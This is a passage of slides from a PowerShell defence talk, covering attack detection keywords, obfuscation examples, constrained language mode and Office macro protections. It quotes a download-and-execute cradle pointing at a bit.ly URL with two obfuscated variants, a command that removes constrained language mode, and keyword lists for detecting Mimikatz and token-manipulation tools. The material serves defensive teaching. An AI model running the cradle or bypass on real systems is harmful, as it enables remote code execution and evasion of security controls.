![Page 70: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/70.jpg)
PowerShell Attack Detection
•Log all PowerShell activity
• Interesting Activity:• .Net Web Client download.• Invoke-Expression (and derivatives: “iex”).• “EncodedCommand” (“-enc”) & “Bypass”•BITS activity.• Scheduled Task creation/deletion.•PowerShell Remoting (WinRM).
• This is a good start…Sean Metcalf (@Pyrotek3)
![Page 71: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/71.jpg)
PowerShell Attack Detection: Interesting Activity
Invoke-Expression (IEX)
Sean Metcalf (@Pyrotek3)
![Page 72: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/72.jpg)
PowerShell Attack Detection: Interesting Activity
.Net Web Client download
Sean Metcalf (@Pyrotek3)
![Page 73: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/73.jpg)
Detect Invoke-Mimikatz?
Keywords:• “mimikatz” • “gentilkiwi” • “Invoke-Mimikatz”
Sean Metcalf (@Pyrotek3)
![Page 74: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/74.jpg)
Detecting Invoke-Mimikatz: Event Log Keywords• “TOKEN_PRIVILEGES”
• “SE_PRIVILEGE_ENABLED“
• “System.Reflection.AssemblyName”
• “System.Reflection.Emit.AssemblyBuilderAccess “
• “System.Runtime.InteropServices.MarshalAsAttribute”
Sean Metcalf (@Pyrotek3)
![Page 75: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/75.jpg)
Offensive PowerShell Detection in PS Logs
• Invoke-TokenManipulation: • “TOKEN_IMPERSONATE” • “TOKEN_DUPLICATE” • “TOKEN_ADJUST_PRIVILEGES”
• Invoke-CredentialInjection:• “TOKEN_PRIVILEGES” • “GetDelegateForFunctionPointer”
• Invoke-DLLInjection• “System.Reflection.AssemblyName“• “System.Reflection.Emit.AssemblyBuilderAccess“
Sean Metcalf (@Pyrotek3)
![Page 76: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/76.jpg)
P\/\/3R5h311 06fU5(@Ti0N
Sean Metcalf (@Pyrotek3)
![Page 77: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/77.jpg)
PowerShell ObfuscationPS C:\> Invoke-Obfuscation
Sean Metcalf (@Pyrotek3)
![Page 78: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/78.jpg)
Invoke-Obfuscation PowerShell Module
•Written by Blue-teamer Daniel Bohannon.
•Highlights gaps in finding offensive PowerShell code.
Sean Metcalf (@Pyrotek3)
![Page 79: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/79.jpg)
Sean Metcalf (@Pyrotek3) Daniel Bohannon at DerbyCon 6 (2016)
![Page 80: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/80.jpg)
Standard Command
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
Daniel Bohannon at DerbyCon 6 (2016)Sean Metcalf (@Pyrotek3)
![Page 81: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/81.jpg)
Standard Command - Obfuscated
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
&( "I"+ "nv" +"OK"+"e-EXPreSsIon" ) (&( "new-O"+ "BJ"+"Ect") ('Net' +'.We'+'bClient' ) ).( 'dOWnlO' +'aDS'+'TrinG').Invoke( ('http://bi'+'t.ly/'+'L3' +'g1t' ))
Daniel Bohannon at DerbyCon 6 (2016)Sean Metcalf (@Pyrotek3)
![Page 82: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/82.jpg)
Sean Metcalf (@Pyrotek3) Daniel Bohannon at DerbyCon 6 (2016)
![Page 83: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/83.jpg)
Standard Command - Obfuscated
Invoke-Expression (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')
&("{0}{2}{3}{1}{4}"-f 'In','e','voke-Exp','r','ssion') (&( "{2}{0}{1}"-f'w-Obje','ct','Ne') ( "{0}{1}{2}{3}"-f 'N','et.','Web','Client') ).("{0}{3}{1}{2}{4}"-f'Downl','ad','S','o','tring' ).Invoke(( 'http' + ':'+'/'+'/bi' +'t.ly'+'/L3g1t' ))
Daniel Bohannon at DerbyCon 6 (2016)Sean Metcalf (@Pyrotek3)
![Page 84: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/84.jpg)
Sean Metcalf (@Pyrotek3) Daniel Bohannon at DerbyCon 6 (2016)
![Page 85: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/85.jpg)
Sean Metcalf (@Pyrotek3)
![Page 86: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/86.jpg)
Sean Metcalf (@Pyrotek3)
![Page 87: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/87.jpg)
Sean Metcalf (@Pyrotek3)
![Page 88: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/88.jpg)
Sean Metcalf (@Pyrotek3)
![Page 89: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/89.jpg)
Obfuscation Bypasses AV
Sean Metcalf (@Pyrotek3)
![Page 90: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/90.jpg)
Sean Metcalf (@Pyrotek3)
![Page 91: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/91.jpg)
Sean Metcalf (@Pyrotek3)
![Page 92: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/92.jpg)
PowerShell DefensesSean Metcalf (@Pyrotek3)
![Page 93: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/93.jpg)
PowerShell Security: Constrained PowerShell•Useful interim PowerShell security measure.
• Enabled Constrained Language Mode:[Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
• Enable via Group Policy:• Computer Configuration\Preferences\
Windows Settings\Environment
Sean Metcalf (@Pyrotek3)
![Page 94: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/94.jpg)
PowerShell Security: Constrained PowerShell
•Can mitigate initial PowerShell attack.
•Not a panacea.
•Considered minor mitigation method on roadmap to whitelisting.
•Bypassing Constrained PowerShell is possible
•Remove Constrained Language Mode:Remove-Item Env:\__PSLockdownPolicy
•Check Language Mode:$ExecutionContext.SessionState.LanguageMode
Sean Metcalf (@Pyrotek3)
![Page 95: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/95.jpg)
Sean Metcalf (@Pyrotek3)
![Page 96: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/96.jpg)
Finding Obfuscated EvilRegular Obfuscated
e $
t {
r }
a +
i “
o =
n [
s (
l ;
Sean Metcalf (@Pyrotek3) http://www.leeholmes.com/blog/2016/10/22/more-detecting-obfuscated-powershell/
![Page 97: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/97.jpg)
Finding Obfuscated Evil
• Deploy PowerShell v5.
• Enable PowerShell script block logging.
• Look for lots of brackets { }
• Look for lots of quotes (single & double) “ “ & ‘ ’
• Look for random function names & many unusual characters not normally in PowerShell scripts.
Sean Metcalf (@Pyrotek3)
![Page 98: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/98.jpg)
Offensive PowerShell Detection Cheatsheet• AdjustTokenPrivileges
• IMAGE_NT_OPTIONAL_HDR64_MAGIC
• Management.Automation.RuntimeException
• Microsoft.Win32.UnsafeNativeMethods
• ReadProcessMemory.Invoke
• Runtime.InteropServices
• SE_PRIVILEGE_ENABLED
• System.Security.Cryptography
• System.Reflection.AssemblyName
• System.Runtime.InteropServices
• LSA_UNICODE_STRING
• MiniDumpWriteDump
• PAGE_EXECUTE_READ
• Net.Sockets.SocketFlags
• Reflection.Assembly
• SECURITY_DELEGATION
• CreateDelegateSean Metcalf (@Pyrotek3)
• TOKEN_ADJUST_PRIVILEGES
• TOKEN_ALL_ACCESS
• TOKEN_ASSIGN_PRIMARY
• TOKEN_DUPLICATE
• TOKEN_ELEVATION
• TOKEN_IMPERSONATE
• TOKEN_INFORMATION_CLASS
• TOKEN_PRIVILEGES
• TOKEN_QUERY
• Metasploit
• Advapi32.dll
• kernel32.dll
• msvcrt.dll
• ntdll.dll
• secur32.dll
• user32.dll
• AmsiUtils
![Page 99: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/99.jpg)
Securing PowerShell: A Layered Defense• Update PowerShell to v4 or v5 (where possible) for enhanced logging.• Forward PowerShell logs to a central logging solution (Splunk, etc) and alert on
suspicious activity.• Identify PowerShell usage in the organization (metering) and alert when
abnormal use is detected.• Leverage constrained language mode where possible.• Code sign all Powershell scripts used for system administration & management
(where possible), especially those that run as scheduled task.• Limit admin rights – users should not have admin on their computers!• Ask your anti-malware/anti-virus/bad code detecting software vendor when
they will support AMSI (Win 10).• Block Microsoft Office macros, especially those that originate from the Internet
(Office 2013/2016 GPO).• AppLocker (application whitelisting) to block executable content from user
locations (profile path, home directory, etc), only allow exes from trusted locations (c:\program files, c:\windows, etc), as well as better control PowerShell. Sean Metcalf (@Pyrotek3)
![Page 100: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/100.jpg)
Summary
• PowerShell’s capabilities makes it an excellent tool for attackers.
• PowerShell.exe is not PowerShell.
• Securing PowerShell is not straightforward.
• Enable PowerShell logging to understand its use in the environment.
• PowerShell v5 should be every organization’s new baseline version.
• Attackers use more than just PowerShell.
• Layer your defenses.
Sean Metcalf (@Pyrotek3) Slides: Presentations.ADSecurity.org
![Page 101: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/101.jpg)
THANK YOU!• Ben Ten (@ben0xa)• Carlos Perez (@Carlos_Perez)• Daniel Bohannon (@danielhbohannon)• Jared Haight (@jaredhaight)• Jeffrey Snover (@jsnover)• Justin Warner (@sixdub)• Lee Christensen (@tifkin_)• Lee Holmes (@lee_holmes)• Matt Graeber (@mattifestation)• Matt Nelson (@enigma0x3)• Matthew Dunwoody (@matthewdunwoody)• Will Harmjoy (@Harmj0y)
CONTACT: ….........................……Sean Metcalf (@Pyrotek3)
s e a n [@] TrimarcSecurity.comwww.ADSecurity.orgTrimarcSecurity.com
Slides: Presentations.ADSecurity.org Sean Metcalf (@Pyrotek3)
![Page 102: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/102.jpg)
References• DEF CON 18 – Dave Kennedy & Josh Kelly – PowerShell OMFG!
https://www.youtube.com/watch?v=CmmcpSsAbaM
• DEF CON 21 - Joe Bialek- PowerPwning: Post-Exploiting By Overpowering PS https://www.defcon.org/images/defcon-21/dc-21-presentations/Bialek/DEFCON-21-Bialek-PowerPwning-Post-Exploiting-by-Overpowering-Powershell.pdf
• PowerShell Empirehttp://PowerShellEmpire.com
• DerbyCon 6 (2016) Ben Ten (Ben0xA) – PowerShell Secrets and Tacticshttps://www.youtube.com/watch?v=mPPv6_adTyg
• DerbyCon 6 (2016) Daniel Bohannon - Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To) D””e`Tec`T ‘Th’+’em’https://www.youtube.com/watch?v=P1lkflnWb0I
• PowerShell Loves the Blue Team – PowerShell v5 featureshttp://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
• ADSecurity.orgSean Metcalf (@Pyrotek3)
![Page 103: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/103.jpg)
And there’s more! (just not now)Microsoft Office Security in the “appendix”
Sean Metcalf (@Pyrotek3)
![Page 104: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/104.jpg)
Appendix
Microsoft Office Macro Security
Sean Metcalf (@Pyrotek3)
![Page 105: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/105.jpg)
Macro Protection by Microsoft Office Version
•Microsoft Office 2000• Low• Medium• High
•Microsoft Office 2003• Low• Medium• High• Very High
Sean Metcalf (@Pyrotek3)
![Page 106: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/106.jpg)
Macro Protection by Microsoft Office Version•Microsoft Office 2007 (Trust Center)•Office 2007 New Macro Security Options
• Disable all macros without notification• Disable all macros with notification• Disable all macros except digitally signed macros• Enable all macros (not recommended, potentially dangerous
code can run)• Trust access to the VBA project object model
•Microsoft Office 2010 -• By default, VBA is enabled & trusted VBA macros are allowed to
run.• Trusted Locations• Trusted Publishers• Office Protected View Sean Metcalf (@Pyrotek3)
![Page 107: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/107.jpg)
Microsoft Office Protected View (2010)
• Files from risky locations (Internet) are opened in Protected View.
•MOICE (Microsoft Office Isolated Converter Environment).
•MOICE takes a potentially risky binary file type and convert it within a sandboxed process to the new XML format, then back to the binary format and open it.
•Purpose is to remove any exploit code that was hidden away within the file.
Sean Metcalf (@Pyrotek3)
![Page 108: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/108.jpg)
Macro Protection by Microsoft Office Version•Microsoft Office 2013 Telemetry Dashboard
• determine macro usage• Disabled by default• Enabled by using Group Policy, registry settings, or by
selecting the Enable Logging button in Telemetry Log• https://technet.microsoft.com/en-us/library/jj863580.aspx• https://blogs.technet.microsoft.com/office_resource_kit/2
012/08/08/using-office-telemetry-dashboard-to-see-how-well-your-office-solutions-perform-in-office-2013/
•Microsoft Office 2016• Block macros in files originating from the Internet and
external email systems (now back-ported to Office 2013)Sean Metcalf (@Pyrotek3)
![Page 109: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/109.jpg)
Office 2013 Telemetry Dashboardhttps://blogs.technet.microsoft.com/office_resource_kit/2012/08/08/using-office-telemetry-dashboard-to-see-how-well-your-office-solutions-perform-in-office-2013/
Sean Metcalf (@Pyrotek3)
![Page 110: PowerShell Security: Defending the Enterprise from the ... · PDF filePowerShell Security: Defending the Enterprise from the ... Trend Micro: ?? 6. Symantec: ??? 7. ... PowerShell](https://reader034.fdocuments.in/reader034/viewer/2022051306/5aa908d57f8b9a6c188c4d44/html5/thumbnails/110.jpg)
Contact InfoTwitter:@Pyrotek3
Email:sean/@\adsecurity.orgsean/@\trimarcsecurity.com
Company Info:TrimarcSecurity.com
AD Security Info:www.ADSecurity.org
Sean Metcalf (@Pyrotek3)